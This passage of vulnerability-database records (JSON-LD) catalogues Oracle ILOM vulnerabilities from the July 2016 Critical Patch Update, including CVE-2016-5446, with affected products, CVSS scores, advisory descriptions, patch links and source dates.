trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003874", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, ], trust: 0.3, }, cve: "CVE-2016-5446", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2016-5446", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-94265", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", exploitabilityScore: 3.9, id: "CVE-2016-5446", impactScore: 3.4, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5446", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5446", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-810", trust: 0.6, value: "HIGH", }, { author: "VULHUB", id: "VHN-94265", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5446", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Infrastructure. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'Multiple' protocol. The 'Infrastructure' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5446", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5446", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91998", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003874", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-810", trust: 0.7, }, { db: "VULHUB", id: "VHN-94265", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5446", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, id: "VAR-201607-0653", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94265", }, ], trust: 0.01, }, last_update_date: "2024-11-23T19:56:37.120000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite Infrastructure Subcomponent security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63170", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5446", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5446", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91998", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5446", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5446", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94265", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5446", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91998", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003874", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-810", }, { date: "2016-07-21T10:15:00.757000", db: "NVD", id: "CVE-2016-5446", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94265", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5446", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91998", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003874", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-810", }, { date: "2024-11-21T02:54:19.903000", db: "NVD", id: "CVE-2016-5446", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Infrastructure Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003874", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, ], trust: 0.6, }, }
var-201607-0661
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to IPMI. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'IPMI' protocol. The 'IPMI' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0661", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": 